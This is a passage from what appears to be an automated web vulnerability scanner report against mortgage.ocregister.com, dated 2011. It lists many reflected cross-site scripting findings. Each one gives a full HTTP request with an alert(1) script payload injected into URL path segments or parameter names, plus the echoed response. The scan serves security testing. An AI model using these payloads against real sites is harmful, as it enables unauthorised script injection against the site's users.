Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008fb99f\"><script>alert(1)</script>73505128c2a/12/feed/" />
...[SNIP]...

1.280. http://mortgage.ocregister.com/2008/12/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/12/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f6bd"><script>alert(1)</script>e08417cca0d was submitted in the REST URL parameter 2. This input was echoed as 9f6bd\"><script>alert(1)</script>e08417cca0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/129f6bd"><script>alert(1)</script>e08417cca0d/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/129f6bd\"><script>alert(1)</script>e08417cca0d/feed/" />
...[SNIP]...

1.281. http://mortgage.ocregister.com/2008/12/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 581fa"><script>alert(1)</script>91923fa8a10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 581fa\"><script>alert(1)</script>91923fa8a10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/12/?581fa"><script>alert(1)</script>91923fa8a10=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/12/?581fa\"><script>alert(1)</script>91923fa8a10=1feed/" />
...[SNIP]...

1.282. http://mortgage.ocregister.com/2009/01/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/01/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d904e"><script>alert(1)</script>ffe0d03125f was submitted in the REST URL parameter 1. This input was echoed as d904e\"><script>alert(1)</script>ffe0d03125f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009d904e"><script>alert(1)</script>ffe0d03125f/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009d904e\"><script>alert(1)</script>ffe0d03125f/01/feed/" />
...[SNIP]...

1.283. http://mortgage.ocregister.com/2009/01/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/01/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17425"><script>alert(1)</script>04dd09f1aff was submitted in the REST URL parameter 2. This input was echoed as 17425\"><script>alert(1)</script>04dd09f1aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/0117425"><script>alert(1)</script>04dd09f1aff/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0117425\"><script>alert(1)</script>04dd09f1aff/feed/" />
...[SNIP]...

1.284. http://mortgage.ocregister.com/2009/01/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/01/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dfd6"><script>alert(1)</script>57a08275a9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7dfd6\"><script>alert(1)</script>57a08275a9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/01/?7dfd6"><script>alert(1)</script>57a08275a9d=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/01/?7dfd6\"><script>alert(1)</script>57a08275a9d=1feed/" />
...[SNIP]...

1.285. http://mortgage.ocregister.com/2009/02/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/02/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aae10"><script>alert(1)</script>bd79c7c5eb was submitted in the REST URL parameter 1. This input was echoed as aae10\"><script>alert(1)</script>bd79c7c5eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009aae10"><script>alert(1)</script>bd79c7c5eb/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009aae10\"><script>alert(1)</script>bd79c7c5eb/02/feed/" />
...[SNIP]...

1.286. http://mortgage.ocregister.com/2009/02/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/02/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14452"><script>alert(1)</script>9b71eedb14c was submitted in the REST URL parameter 2. This input was echoed as 14452\"><script>alert(1)</script>9b71eedb14c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/0214452"><script>alert(1)</script>9b71eedb14c/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0214452\"><script>alert(1)</script>9b71eedb14c/feed/" />
...[SNIP]...

1.287. http://mortgage.ocregister.com/2009/02/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a46c5"><script>alert(1)</script>3744f3c36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a46c5\"><script>alert(1)</script>3744f3c36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/02/?a46c5"><script>alert(1)</script>3744f3c36=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 100730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/02/?a46c5\"><script>alert(1)</script>3744f3c36=1feed/" />
...[SNIP]...

1.288. http://mortgage.ocregister.com/2009/03/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/03/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b293"><script>alert(1)</script>6ae8dc92a5 was submitted in the REST URL parameter 1. This input was echoed as 6b293\"><script>alert(1)</script>6ae8dc92a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20096b293"><script>alert(1)</script>6ae8dc92a5/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20096b293\"><script>alert(1)</script>6ae8dc92a5/03/feed/" />
...[SNIP]...

1.289. http://mortgage.ocregister.com/2009/03/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/03/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caa27"><script>alert(1)</script>d1503a6c825 was submitted in the REST URL parameter 2. This input was echoed as caa27\"><script>alert(1)</script>d1503a6c825 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/03caa27"><script>alert(1)</script>d1503a6c825/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/03caa27\"><script>alert(1)</script>d1503a6c825/feed/" />
...[SNIP]...

1.290. http://mortgage.ocregister.com/2009/03/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/03/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 572c6"><script>alert(1)</script>7284a87d77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 572c6\"><script>alert(1)</script>7284a87d77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/03/?572c6"><script>alert(1)</script>7284a87d77=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/03/?572c6\"><script>alert(1)</script>7284a87d77=1feed/" />
...[SNIP]...

1.291. http://mortgage.ocregister.com/2009/04/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/04/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f1d"><script>alert(1)</script>e69b8dc3898 was submitted in the REST URL parameter 1. This input was echoed as e5f1d\"><script>alert(1)</script>e69b8dc3898 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009e5f1d"><script>alert(1)</script>e69b8dc3898/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009e5f1d\"><script>alert(1)</script>e69b8dc3898/04/feed/" />
...[SNIP]...

1.292. http://mortgage.ocregister.com/2009/04/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/04/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a43"><script>alert(1)</script>1a1ab7a0c99 was submitted in the REST URL parameter 2. This input was echoed as b1a43\"><script>alert(1)</script>1a1ab7a0c99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04b1a43"><script>alert(1)</script>1a1ab7a0c99/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/04b1a43\"><script>alert(1)</script>1a1ab7a0c99/feed/" />
...[SNIP]...

1.293. http://mortgage.ocregister.com/2009/04/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/04/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d59d"><script>alert(1)</script>7366da0a954 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3d59d\"><script>alert(1)</script>7366da0a954 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04/?3d59d"><script>alert(1)</script>7366da0a954=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
